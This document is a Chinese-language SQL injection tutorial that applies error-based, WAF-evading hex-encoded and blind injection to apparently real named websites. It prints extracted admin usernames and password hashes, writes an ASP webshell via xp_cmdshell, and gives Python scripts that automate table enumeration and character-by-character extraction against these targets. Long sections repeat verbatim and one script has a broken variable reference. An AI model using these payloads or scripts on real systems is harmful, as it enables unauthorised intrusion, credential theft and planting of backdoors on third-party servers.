報錯注入:
- 例子:http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1
【1】首先爆版本:http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1 and @@version>0
報錯信息:在將 nvarchar 值 'Microsoft SQL Server 2008 R2 (RTM) - 10.50.1600.1 (X64)
Apr 2 2010 15:48:46
Copyright (c) Microsoft Corporation
Enterprise Edition (64-bit) on Windows NT 6.1 <X64> (Build 7601: Service Pack 1)
' 轉換成數據類型 int 時失敗。
原因:@@version是mssql 的全局變量,如果我們把它寫成這樣 and @@version>0 那個后面的mssql就會強行把@@version 強行轉換成數字,但是失敗,所以就會將數據庫信息暴露出來
同樣:通過
@@SERVERNAME:爆計算機名稱
同樣:通過
@@SERVERNAME:爆計算機名稱
【2】:爆當前數據庫名:http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1 and db_name()>0
報錯信息:在將 nvarchar 值 'kaifeng' 轉換成數據類型 int 時失敗。
【3】當前用戶:http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1 and User_Name()>0
報錯信息:在將 nvarchar 值 'dbo' 轉換成數據類型 int 時失敗。
Ps:如果看到dbo 那么多半當前數據庫的用戶是dba權限
【4】爆其他數據庫:http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1 and (SELECT top 1 Name FROM Master..SysDatabases)>0
報錯信息:在將 nvarchar 值 'master' 轉換成數據類型 int 時失敗。
再爆其他的數據庫則這么寫:http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1 and (SELECT top 1 Name FROM Master..SysDatabases where name not in ('master'))>0
繼續的話要這么寫:http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1 and (SELECT top 1 Name FROM Master..SysDatabases where name not in ('master','kaifeng'))>0
【5】爆表則:
http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1 and (select top 1 name from [數據庫名字].sys.all_objects where type='U' AND is_ms_shipped=0)>0
例子:
http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1 and (select top 1 name from kaifeng.sys.all_objects where type='U' AND is_ms_shipped=0)>0
報錯信息:在將 nvarchar 值 'FRIENDLINK' 轉換成數據類型 int 時失敗。
再爆其他表:http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1 and (select top 1 name from kaifeng.sys.all_objects where type='U' AND is_ms_shipped=0 and name not in ('FRIENDLINK'))>0
在繼續:
http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1 and (select top 1 name from kaifeng.sys.all_objects where type='U' AND is_ms_shipped=0 and name not in ('FRIENDLINK','FRIENDLINK1'))>0
【6】爆字段則:http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1 and (select top 1 COLUMN_NAME from kaifeng.information_schema.columns where TABLE_NAME='A_WEBADMIN')>0
例如:
http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1 and (select top 1 COLUMN_NAME from kaifeng.information_schema.columns where TABLE_NAME='A_WEBADMIN')>0
報錯信息:在將 nvarchar 值 'ID' 轉換成數據類型 int 時失敗。
報錯信息:在將 nvarchar 值 'kaifeng' 轉換成數據類型 int 時失敗。
【3】當前用戶:http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1 and User_Name()>0
報錯信息:在將 nvarchar 值 'dbo' 轉換成數據類型 int 時失敗。
Ps:如果看到dbo 那么多半當前數據庫的用戶是dba權限
【4】爆其他數據庫:http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1 and (SELECT top 1 Name FROM Master..SysDatabases)>0
報錯信息:在將 nvarchar 值 'master' 轉換成數據類型 int 時失敗。
再爆其他的數據庫則這么寫:http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1 and (SELECT top 1 Name FROM Master..SysDatabases where name not in ('master'))>0
繼續的話要這么寫:http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1 and (SELECT top 1 Name FROM Master..SysDatabases where name not in ('master','kaifeng'))>0
【5】爆表則:
http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1 and (select top 1 name from [數據庫名字].sys.all_objects where type='U' AND is_ms_shipped=0)>0
例子:
http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1 and (select top 1 name from kaifeng.sys.all_objects where type='U' AND is_ms_shipped=0)>0
報錯信息:在將 nvarchar 值 'FRIENDLINK' 轉換成數據類型 int 時失敗。
再爆其他表:http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1 and (select top 1 name from kaifeng.sys.all_objects where type='U' AND is_ms_shipped=0 and name not in ('FRIENDLINK'))>0
在繼續:
http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1 and (select top 1 name from kaifeng.sys.all_objects where type='U' AND is_ms_shipped=0 and name not in ('FRIENDLINK','FRIENDLINK1'))>0
【6】爆字段則:http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1 and (select top 1 COLUMN_NAME from kaifeng.information_schema.columns where TABLE_NAME='A_WEBADMIN')>0
例如:
http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1 and (select top 1 COLUMN_NAME from kaifeng.information_schema.columns where TABLE_NAME='A_WEBADMIN')>0
報錯信息:在將 nvarchar 值 'ID' 轉換成數據類型 int 時失敗。
再爆其他字段:
http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1 and (select top 1 COLUMN_NAME from kaifeng.information_schema.columns where TABLE_NAME='A_WEBADMIN' and COLUMN_NAME not in('ID'))>0
再繼續:
http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1 and (select top 1 COLUMN_NAME from kaifeng.information_schema.columns where TABLE_NAME='A_WEBADMIN' and COLUMN_NAME not in('ID','A_USERNAME'))>0
【7】爆數據:
http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1 and (select top 1 字段 from 數據庫名.表名)>0
例子:
http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1 and (select top 1 A_PASSWORD from A_WEBADMIN)>0
報錯信息:在將 nvarchar 值 'B5A1EF8730200F93E50F4F5DEBBCAC0B' 轉換成數據類型 int 時失敗。
如果數據的權限是dba,且知道網站路徑的話,那么我們就可以用這個語句來寫一句話小馬進去:
http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1;exec master..xp_cmdshell 'echo "<%@ LANGUAGE=VBSCRIPT %>;<%eval request(chr(35))%>''" > d:\KfSite\kaifeng\2.asp'--
原理是sql server 支持堆疊查詢,利用xp_cmdshell 可以執行cmd指令,cmd指令中用【echo 內容 > 文件】 可以寫文件到磁盤里面
http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1 and (select top 1 COLUMN_NAME from kaifeng.information_schema.columns where TABLE_NAME='A_WEBADMIN' and COLUMN_NAME not in('ID'))>0
再繼續:
http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1 and (select top 1 COLUMN_NAME from kaifeng.information_schema.columns where TABLE_NAME='A_WEBADMIN' and COLUMN_NAME not in('ID','A_USERNAME'))>0
【7】爆數據:
http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1 and (select top 1 字段 from 數據庫名.表名)>0
例子:
http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1 and (select top 1 A_PASSWORD from A_WEBADMIN)>0
報錯信息:在將 nvarchar 值 'B5A1EF8730200F93E50F4F5DEBBCAC0B' 轉換成數據類型 int 時失敗。
如果數據的權限是dba,且知道網站路徑的話,那么我們就可以用這個語句來寫一句話小馬進去:
http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1;exec master..xp_cmdshell 'echo "<%@ LANGUAGE=VBSCRIPT %>;<%eval request(chr(35))%>''" > d:\KfSite\kaifeng\2.asp'--
原理是sql server 支持堆疊查詢,利用xp_cmdshell 可以執行cmd指令,cmd指令中用【echo 內容 > 文件】 可以寫文件到磁盤里面
繞過waf防火牆的注入:
利用hex編碼來繞過waf防火牆:
例子
http://www.ikcw.com/jiuzhu/qiuzhuzhe.aspx?username=niuxinyi
利用hackbar 這個工具的Encoding 底下的HEX Encoding輕松把字符串編碼成為可以利用的hex
然后利用報錯注入就可以輕松完爆這個網站
【1】爆數據庫版本:
select convert(int,@@version) hex編碼后:0x73656c65637420636f6e7665727428696e742c404076657273696f6e29
然后我們這樣注入:
http://www.ikcw.com/jiuzhu/qiuzhuzhe.aspx?username=niuxinyi'; dEcLaRe @s vArChAr(8000) sEt @s=0x73656c65637420636f6e7665727428696e742c404076657273696f6e29 eXeC(@s)--
報錯信息為:在將 nvarchar 值 'Microsoft SQL Server 2008 R2 (RTM) - 10.50.1600.1 (X64)
Apr 2 2010 15:48:46
Copyright (c) Microsoft Corporation
Standard Edition (64-bit) on Windows NT 6.1 <X64> (Build 7601: Service Pack 1) (Hypervisor)
' 轉換成數據類型 int 時失敗。
【2】爆當前數據庫
select convert(int,db_name()) hex 編碼后:
0x73656c65637420636f6e7665727428696e742c64625f6e616d65282929
然后我們這樣注入:
http://www.ikcw.com/jiuzhu/qiuzhuzhe.aspx?username=niuxinyi'; dEcLaRe @s vArChAr(8000) sEt @s=0x73656c65637420636f6e7665727428696e742c64625f6e616d65282929 eXeC(@s)--
報錯信息為:在將 nvarchar 值 'qds0240012_db' 轉換成數據類型 int 時失敗。
【3】爆用戶:
select convert(int,User_Name())
hex編碼后:
0x73656c65637420636f6e7665727428696e742c557365725f4e616d65282929
這樣注入:
http://www.ikcw.com/jiuzhu/qiuzhuzhe.aspx?username=niuxinyi'; dEcLaRe @s vArChAr(8000) sEt @s=0x73656c65637420636f6e7665727428696e742c557365725f4e616d65282929 eXeC(@s)--
報錯信息:
在將 nvarchar 值 'dbo' 轉換成數據類型 int 時失敗。
利用hex編碼來繞過waf防火牆:
例子
http://www.ikcw.com/jiuzhu/qiuzhuzhe.aspx?username=niuxinyi
利用hackbar 這個工具的Encoding 底下的HEX Encoding輕松把字符串編碼成為可以利用的hex
然后利用報錯注入就可以輕松完爆這個網站
【1】爆數據庫版本:
select convert(int,@@version) hex編碼后:0x73656c65637420636f6e7665727428696e742c404076657273696f6e29
然后我們這樣注入:
http://www.ikcw.com/jiuzhu/qiuzhuzhe.aspx?username=niuxinyi'; dEcLaRe @s vArChAr(8000) sEt @s=0x73656c65637420636f6e7665727428696e742c404076657273696f6e29 eXeC(@s)--
報錯信息為:在將 nvarchar 值 'Microsoft SQL Server 2008 R2 (RTM) - 10.50.1600.1 (X64)
Apr 2 2010 15:48:46
Copyright (c) Microsoft Corporation
Standard Edition (64-bit) on Windows NT 6.1 <X64> (Build 7601: Service Pack 1) (Hypervisor)
' 轉換成數據類型 int 時失敗。
【2】爆當前數據庫
select convert(int,db_name()) hex 編碼后:
0x73656c65637420636f6e7665727428696e742c64625f6e616d65282929
然后我們這樣注入:
http://www.ikcw.com/jiuzhu/qiuzhuzhe.aspx?username=niuxinyi'; dEcLaRe @s vArChAr(8000) sEt @s=0x73656c65637420636f6e7665727428696e742c64625f6e616d65282929 eXeC(@s)--
報錯信息為:在將 nvarchar 值 'qds0240012_db' 轉換成數據類型 int 時失敗。
【3】爆用戶:
select convert(int,User_Name())
hex編碼后:
0x73656c65637420636f6e7665727428696e742c557365725f4e616d65282929
這樣注入:
http://www.ikcw.com/jiuzhu/qiuzhuzhe.aspx?username=niuxinyi'; dEcLaRe @s vArChAr(8000) sEt @s=0x73656c65637420636f6e7665727428696e742c557365725f4e616d65282929 eXeC(@s)--
報錯信息:
在將 nvarchar 值 'dbo' 轉換成數據類型 int 時失敗。
【3】爆表:
select convert(int, (select top 1 name from qds0240012_db
.sys.all_objects where type='U' AND is_ms_shipped=0))
hex編碼后:
0x73656c65637420636f6e7665727428696e742c202873656c65637420746f702031206e616d652066726f6d20716473303234303031325f6462202e7379732e616c6c5f6f626a6563747320776865726520747970653d27552720414e442069735f6d735f736869707065643d302929
我們這樣注入:http://www.ikcw.com/jiuzhu/qiuzhuzhe.aspx?username=niuxinyi'; dEcLaRe @s vArChAr(8000) sEt @s=0x73656c65637420636f6e7665727428696e742c202873656c65637420746f702031206e616d652066726f6d20716473303234303031325f6462202e7379732e616c6c5f6f626a6563747320776865726520747970653d27552720414e442069735f6d735f736869707065643d302929 eXeC(@s)--
報錯信息:在將 nvarchar 值 'CMS_ArticleClass' 轉換成數據類型 int 時失敗。
繼續爆表:
select convert(int, (select top 1 name from qds0240012_db
.sys.all_objects where type='U' AND is_ms_shipped=0 and name not in ('CMS_ArticleClass')))
hex編碼后:
0x73656c65637420636f6e7665727428696e742c202873656c65637420746f702031206e616d652066726f6d20716473303234303031325f6462202e7379732e616c6c5f6f626a6563747320776865726520747970653d27552720414e442069735f6d735f736869707065643d3020616e64206e616d65206e6f7420696e202827434d535f41727469636c65436c61737327292929
這樣注入:
http://www.ikcw.com/jiuzhu/qiuzhuzhe.aspx?username=niuxinyi'; dEcLaRe @s vArChAr(8000) sEt @s=0x73656c65637420636f6e7665727428696e742c202873656c65637420746f702031206e616d652066726f6d20716473303234303031325f6462202e7379732e616c6c5f6f626a6563747320776865726520747970653d27552720414e442069735f6d735f736869707065643d3020616e64206e616d65206e6f7420696e202827434d535f41727469636c65436c61737327292929 eXeC(@s)--
報錯信息為:
在將 nvarchar 值 'CMS_Career' 轉換成數據類型 int 時失敗。
繼續
select convert(int, (select top 1 name from qds0240012_db
.sys.all_objects where type='U' AND is_ms_shipped=0))
hex編碼后:
0x73656c65637420636f6e7665727428696e742c202873656c65637420746f702031206e616d652066726f6d20716473303234303031325f6462202e7379732e616c6c5f6f626a6563747320776865726520747970653d27552720414e442069735f6d735f736869707065643d302929
我們這樣注入:http://www.ikcw.com/jiuzhu/qiuzhuzhe.aspx?username=niuxinyi'; dEcLaRe @s vArChAr(8000) sEt @s=0x73656c65637420636f6e7665727428696e742c202873656c65637420746f702031206e616d652066726f6d20716473303234303031325f6462202e7379732e616c6c5f6f626a6563747320776865726520747970653d27552720414e442069735f6d735f736869707065643d302929 eXeC(@s)--
報錯信息:在將 nvarchar 值 'CMS_ArticleClass' 轉換成數據類型 int 時失敗。
繼續爆表:
select convert(int, (select top 1 name from qds0240012_db
.sys.all_objects where type='U' AND is_ms_shipped=0 and name not in ('CMS_ArticleClass')))
hex編碼后:
0x73656c65637420636f6e7665727428696e742c202873656c65637420746f702031206e616d652066726f6d20716473303234303031325f6462202e7379732e616c6c5f6f626a6563747320776865726520747970653d27552720414e442069735f6d735f736869707065643d3020616e64206e616d65206e6f7420696e202827434d535f41727469636c65436c61737327292929
這樣注入:
http://www.ikcw.com/jiuzhu/qiuzhuzhe.aspx?username=niuxinyi'; dEcLaRe @s vArChAr(8000) sEt @s=0x73656c65637420636f6e7665727428696e742c202873656c65637420746f702031206e616d652066726f6d20716473303234303031325f6462202e7379732e616c6c5f6f626a6563747320776865726520747970653d27552720414e442069735f6d735f736869707065643d3020616e64206e616d65206e6f7420696e202827434d535f41727469636c65436c61737327292929 eXeC(@s)--
報錯信息為:
在將 nvarchar 值 'CMS_Career' 轉換成數據類型 int 時失敗。
繼續
select convert(int, (select top 1 name from qds0240012_db
.sys.all_objects where type='U' AND is_ms_shipped=0 and name not in ('CMS_ArticleClass','CMS_Career')))
轉換成hex:
0x73656c65637420636f6e7665727428696e742c202873656c65637420746f702031206e616d652066726f6d20716473303234303031325f6462202e7379732e616c6c5f6f626a6563747320776865726520747970653d27552720414e442069735f6d735f736869707065643d3020616e64206e616d65206e6f7420696e202827434d535f41727469636c65436c617373272c27434d535f43617265657227292929
這樣注入:
http://www.ikcw.com/jiuzhu/qiuzhuzhe.aspx?username=niuxinyi'; dEcLaRe @s vArChAr(8000) sEt @s=0x73656c65637420636f6e7665727428696e742c202873656c65637420746f702031206e616d652066726f6d20716473303234303031325f6462202e7379732e616c6c5f6f626a6563747320776865726520747970653d27552720414e442069735f6d735f736869707065643d3020616e64206e616d65206e6f7420696e202827434d535f41727469636c65436c617373272c27434d535f43617265657227292929 eXeC(@s)--
報錯信息:
在將 nvarchar 值 'CMS_CareerClass' 轉換成數據類型 int 時失敗。
表為:
.sys.all_objects where type='U' AND is_ms_shipped=0 and name not in ('CMS_ArticleClass','CMS_Career')))
轉換成hex:
0x73656c65637420636f6e7665727428696e742c202873656c65637420746f702031206e616d652066726f6d20716473303234303031325f6462202e7379732e616c6c5f6f626a6563747320776865726520747970653d27552720414e442069735f6d735f736869707065643d3020616e64206e616d65206e6f7420696e202827434d535f41727469636c65436c617373272c27434d535f43617265657227292929
這樣注入:
http://www.ikcw.com/jiuzhu/qiuzhuzhe.aspx?username=niuxinyi'; dEcLaRe @s vArChAr(8000) sEt @s=0x73656c65637420636f6e7665727428696e742c202873656c65637420746f702031206e616d652066726f6d20716473303234303031325f6462202e7379732e616c6c5f6f626a6563747320776865726520747970653d27552720414e442069735f6d735f736869707065643d3020616e64206e616d65206e6f7420696e202827434d535f41727469636c65436c617373272c27434d535f43617265657227292929 eXeC(@s)--
報錯信息:
在將 nvarchar 值 'CMS_CareerClass' 轉換成數據類型 int 時失敗。
表為:
'CMS_ArticleClass','CMS_Career','CMS_CareerClass','CMS_Channel','CMS_Comment','Clz_Article','CMS_DrugsClass','CMS_Article','CMS_Fankui','CMS_Hospital','CMS_Message','CMS_Region_City','CMS_Topics','CMS_Region_District','CMS_Region_Province','CMS_SeekHelp','CMS_Sensitive','CMS_ShortMessage','CMS_TopicsClass','CMS_Drugs','CMS_Transaction','CMS_HospitalClass','CMS_Type','CMS_UserGroup','CJ_BianMa','CJ_GuiZe','CJ_IsDown','CJ_Item','CJ_LanMu','CJ_News','CJ_Pic','CJ_Site','Clz_Article_img','CMS_Userinfo','Clz_Channel','Clz_Column','Clz_Comment','Clz_Content','Clz_Image','Clz_Link','Clz_LinkCate','Clz_Model','Clz_Notice','Clz_Product','Clz_Solicitate','Clz_UserHome','CMS_Admin','CMS_AdminGroup','Clz_Video','Clz_WebSite','D99_Tmp','dtproperties','FeedBack','pangolin_test_table','syscommand','UserSign','vw_Channel','vw_Column','xiaolu','zzq_AD_AD','zzq_AD_Class'
爆表的程序:
#
-*- coding utf-8 -*-
# 爆表
import urllib
import urllib2
import binascii
import re
import time
tables= " '' "
for counti in range(100):
data= " select convert(int, (select top 1 name from qds0240012_db.sys.all_objects where type='U' AND is_ms_shipped=0 and name not in (%s))) " % tables
hexdata= " 0x "+binascii.b2a_hex(data)
urldatatemp={ " username ": " niuxinyi';dEcLaRe @s vArChAr(8000) sEt @s=%s eXeC(@s)-- " % hexdata}
urldata=urllib.urlencode(urldatatemp)
url= " http://www.ikcw.com/jiuzhu/qiuzhuzhe.aspx? "+urldata
headers={ " User-Agent ": " Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 ", " Host ": " www.ikcw.com "}
print url
req=urllib2.Request(url,headers=headers)
resul= ""
try:
urllib2.urlopen(req)
except urllib2.URLError,e:
resul= e.read()
math=re.search( " \'(.*)\' ",resul)
tablestemp=math.group()
print tablestemp
tables=tables+ " , "+tablestemp
print tables
time.sleep(10)
# 爆表
import urllib
import urllib2
import binascii
import re
import time
tables= " '' "
for counti in range(100):
data= " select convert(int, (select top 1 name from qds0240012_db.sys.all_objects where type='U' AND is_ms_shipped=0 and name not in (%s))) " % tables
hexdata= " 0x "+binascii.b2a_hex(data)
urldatatemp={ " username ": " niuxinyi';dEcLaRe @s vArChAr(8000) sEt @s=%s eXeC(@s)-- " % hexdata}
urldata=urllib.urlencode(urldatatemp)
url= " http://www.ikcw.com/jiuzhu/qiuzhuzhe.aspx? "+urldata
headers={ " User-Agent ": " Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 ", " Host ": " www.ikcw.com "}
print url
req=urllib2.Request(url,headers=headers)
resul= ""
try:
urllib2.urlopen(req)
except urllib2.URLError,e:
resul= e.read()
math=re.search( " \'(.*)\' ",resul)
tablestemp=math.group()
print tablestemp
tables=tables+ " , "+tablestemp
print tables
time.sleep(10)
【4】爆字段:
select convert(int,(select top 1 COLUMN_NAME from qds0240012_db.information_schema.columns where TABLE_NAME='CMS_Userinfo'))
hex編碼:
0x73656c65637420636f6e7665727428696e742c2873656c65637420746f70203120434f4c554d4e5f4e414d452066726f6d20716473303234303031325f64622e696e666f726d6174696f6e5f736368656d612e636f6c756d6e73207768657265205441424c455f4e414d453d27434d535f55736572696e666f272929
這樣注入:
http://www.ikcw.com/jiuzhu/qiuzhuzhe.aspx?username=niuxinyi'; dEcLaRe @s vArChAr(8000) sEt @s=0x73656c65637420636f6e7665727428696e742c2873656c65637420746f70203120434f4c554d4e5f4e414d452066726f6d20716473303234303031325f64622e696e666f726d6174696f6e5f736368656d612e636f6c756d6e73207768657265205441424c455f4e414d453d27434d535f55736572696e666f272929 eXeC(@s)--
報錯信息:
在將 nvarchar 值 'id' 轉換成數據類型 int 時失敗。
繼續:
select convert(int,(select top 1 COLUMN_NAME from qds0240012_db.information_schema.columns where TABLE_NAME='CMS_Userinfo' and COLUMN_NAME not in ('id')))
hex編碼:
0x73656c65637420636f6e7665727428696e742c2873656c65637420746f70203120434f4c554d4e5f4e414d452066726f6d20716473303234303031325f64622e696e666f726d6174696f6e5f736368656d612e636f6c756d6e73207768657265205441424c455f4e414d453d27434d535f55736572696e666f2720616e6420434f4c554d4e5f4e414d45206e6f7420696e202827696427292929
這樣注入:
http://www.ikcw.com/jiuzhu/qiuzhuzhe.aspx?username=niuxinyi'; dEcLaRe @s vArChAr(8000) sEt @s=0x73656c65637420636f6e7665727428696e742c2873656c65637420746f70203120434f4c554d4e5f4e414d452066726f6d20716473303234303031325f64622e696e666f726d6174696f6e5f736368656d612e636f6c756d6e73207768657265205441424c455f4e414d453d27434d535f55736572696e666f2720616e6420434f4c554d4e5f4e414d45206e6f7420696e202827696427292929 eXeC(@s)--
報錯信息:
在將 nvarchar 值 'username' 轉換成數據類型 int 時失敗。
在繼續:
select convert(int,(select top 1 COLUMN_NAME from qds0240012_db.information_schema.columns where TABLE_NAME='CMS_Userinfo' and COLUMN_NAME not in ('id','username')))
hex編碼:
0x73656c65637420636f6e7665727428696e742c2873656c65637420746f70203120434f4c554d4e5f4e414d452066726f6d20716473303234303031325f64622e696e666f726d6174696f6e5f736368656d612e636f6c756d6e73207768657265205441424c455f4e414d453d27434d535f55736572696e666f2720616e6420434f4c554d4e5f4e414d45206e6f7420696e2028276964272c27757365726e616d6527292929
這樣注入:
http://www.ikcw.com/jiuzhu/qiuzhuzhe.aspx?username=niuxinyi'; dEcLaRe @s vArChAr(8000) sEt @s=0x73656c65637420636f6e7665727428696e742c2873656c65637420746f70203120434f4c554d4e5f4e414d452066726f6d20716473303234303031325f64622e696e666f726d6174696f6e5f736368656d612e636f6c756d6e73207768657265205441424c455f4e414d453d27434d535f55736572696e666f2720616e6420434f4c554d4e5f4e414d45206e6f7420696e2028276964272c27757365726e616d6527292929 eXeC(@s)--
報錯信息:
在將 nvarchar 值 'nickname' 轉換成數據類型 int 時失敗。
CMS_Userinfo 字段:
'id','username','nickname','password','realname','problem','answer','gender','age','adminid','groupid','regip','joindate','lastip','lastvisitdate','digestposts','pageviews','popular','unwelcome','credits','extcredits1','extcredits2','extcredits3','extcredits4','extcredits5','extcredits6','extcredits7','extcredits8','avatar','email','onlinestate','onlineDate','vip','isalliance','status','phone','mobile','qq','msn','address','postcode','sitename','siteIntroduction','website','sitetype','income','expenditure','funds','birthday','province','district','city','logincount','integral','gold','top','headlines','recommend','audit','orderid','healthlevel','professional','post','isdelete','deletestaff','datetime','code','edu','national','remark','photo','usertype','yuyan','fuwuneirong','fuwushijian'
CMS_Admin字段:
'id','username','password','realname','lastloginip','lastlogintime','logincount','allowmultilogin','groupid','groupname'
【5】爆數據:
select convert(int,(select top 1 username from CMS_Admin))
hex編碼:
0x73656c65637420636f6e7665727428696e742c2873656c65637420746f70203120757365726e616d652066726f6d20434d535f41646d696e2929
這樣注入:
http://www.ikcw.com/jiuzhu/qiuzhuzhe.aspx?username=niuxinyi'; dEcLaRe @s vArChAr(8000) sEt @s=0x73656c65637420636f6e7665727428696e742c2873656c65637420746f70203120757365726e616d652066726f6d20434d535f41646d696e2929 eXeC(@s)--
報錯信息:
在將 nvarchar 值 'admin' 轉換成數據類型 int 時失敗。
繼續,爆密碼
select convert(int,(select top 1 password from CMS_Admin))
hex編碼:
0x73656c65637420636f6e7665727428696e742c2873656c65637420746f7020312070617373776f72642066726f6d20434d535f41646d696e2929
這樣注入:
http://www.ikcw.com/jiuzhu/qiuzhuzhe.aspx?username=niuxinyi'; dEcLaRe @s vArChAr(8000) sEt @s=0x73656c65637420636f6e7665727428696e742c2873656c65637420746f7020312070617373776f72642066726f6d20434d535f41646d696e2929 eXeC(@s)--
報錯信息:
在將 nvarchar 值 'sOKhmQxCdfzQy8GPXSskPPIV73jEtf0xvNlvUT3LfsoWe6Cw4ZnsqSlsaYhkMJCR' 轉換成數據類型 int 時失敗。
盲注:
例子:
http://wenfa.nchu.edu.cn/md.aspx?t=0&c=c1
先說一些函數的說明:
substring(str,start,len) 截取字符串的作用,第一個參數為要截取的字符串,第二個參數為從哪里開始截取,第三個參數為截取的長度
ascii(char) 把字符轉換為ascii值
【1】爆數據庫版本:
wenfa.nchu.edu.cn/md.aspx?c=c1'/**/and/**/ascii(substring(@@version,1,1))>0/**/--&t=0
正常頁面
wenfa.nchu.edu.cn/md.aspx?c=c1'/**/and/**/ascii(substring(@@version,1,1))>100/**/--&t=0
不正常頁面
說明@@version的第一個字母的ascii 的范圍是在0到100 之間
wenfa.nchu.edu.cn/md.aspx?c=c1'/**/and/**/ascii(substring(@@version,1,1))=77/**/--&t=0
正常頁面,說明@@version的第一個字母的ascii 的值是77,查表可知為M
第二個字母的注入為:
wenfa.nchu.edu.cn/md.aspx?c=c1'/**/and/**/ascii(substring(@@version,2,1))>0/**/--&t=0
方法相同
來一個爆版本號的腳本:
#
-*- coding: gbk -*-
import urllib2
import urllib
sqlcomm= " @@version "
data = {
" t ": " 0 ",
" c ": " c1'/**/and/**/ascii(substring(@@version,1,1))=77 -- "
}
def getlength():
for counti in range(1000):
data[ " c "]= " c1'/**/and/**/len(%s)=%s/**/-- " % (sqlcomm,str(counti))
urldata=urllib.urlencode(data)
url= " http://wenfa.nchu.edu.cn/md.aspx? "+urldata
headers={ " User-Agent ": " Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 "}
req = urllib2.Request(url,headers=headers)
resul=urllib2.urlopen(req).read()
if len(resul)>34000:
return counti
return False
def sendhttp(countn,sign,num):
data[ " c "]= " c1'/**/and/**/ascii(substring(%s,%s,1))%s%s/**/-- " % (sqlcomm,str(countn),sign,str(middle))
urldata=urllib.urlencode(data)
url= " http://wenfa.nchu.edu.cn/md.aspx? "+urldata
headers={ " User-Agent ": " Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 "}
req = urllib2.Request(url,headers=headers)
resul=urllib2.urlopen(req).read()
if len(resul)>34000:
return True
return False
coutnum= getlength()
for j in range(1,coutnum+1):
min,max=0,140
while min<=max:
middle=(max+min)//2
if sendhttp(j, " = ",middle):
print chr(middle),
break
if sendhttp(j, " > ",middle):
min=middle+1
else:
max=middle-1
import urllib2
import urllib
sqlcomm= " @@version "
data = {
" t ": " 0 ",
" c ": " c1'/**/and/**/ascii(substring(@@version,1,1))=77 -- "
}
def getlength():
for counti in range(1000):
data[ " c "]= " c1'/**/and/**/len(%s)=%s/**/-- " % (sqlcomm,str(counti))
urldata=urllib.urlencode(data)
url= " http://wenfa.nchu.edu.cn/md.aspx? "+urldata
headers={ " User-Agent ": " Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 "}
req = urllib2.Request(url,headers=headers)
resul=urllib2.urlopen(req).read()
if len(resul)>34000:
return counti
return False
def sendhttp(countn,sign,num):
data[ " c "]= " c1'/**/and/**/ascii(substring(%s,%s,1))%s%s/**/-- " % (sqlcomm,str(countn),sign,str(middle))
urldata=urllib.urlencode(data)
url= " http://wenfa.nchu.edu.cn/md.aspx? "+urldata
headers={ " User-Agent ": " Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 "}
req = urllib2.Request(url,headers=headers)
resul=urllib2.urlopen(req).read()
if len(resul)>34000:
return True
return False
coutnum= getlength()
for j in range(1,coutnum+1):
min,max=0,140
while min<=max:
middle=(max+min)//2
if sendhttp(j, " = ",middle):
print chr(middle),
break
if sendhttp(j, " > ",middle):
min=middle+1
else:
max=middle-1
【2】爆當前數據庫名字
wenfa.nchu.edu.cn/md.aspx?c=c1'/**/and/**/ascii(substring(db_name(),1,1))>200/**/--&t=0
ascii大於140發現頁面正常,則當前的數據庫的名字為中文,則換成這樣注入:wenfa.nchu.edu.cn/md.aspx?c=c1' /**/and/**/unicode(substring(db_name(),1,1))>200/**/--&t=0
最后發現:
wenfa.nchu.edu.cn/md.aspx?c=c1'/**/and/**/unicode(substring(db_name(),1,1))=25991/**/--&t=0
在http://www.bangnishouji.com/tools/chtounicode.html查詢
文 轉換成中文,就是“文”字
最后注入發現當前數據庫的為:文法學院
【3】爆表
wenfa.nchu.edu.cn/md.aspx?c=c1'/**/and/**/ascii(substring((select/**/top/**/1 name/**/from/**/文法學院.sys.all_objects where type='U'/**/AND/**/is_ms_shipped=0),1,1))>0/**/--&t=0
爆第二張表:
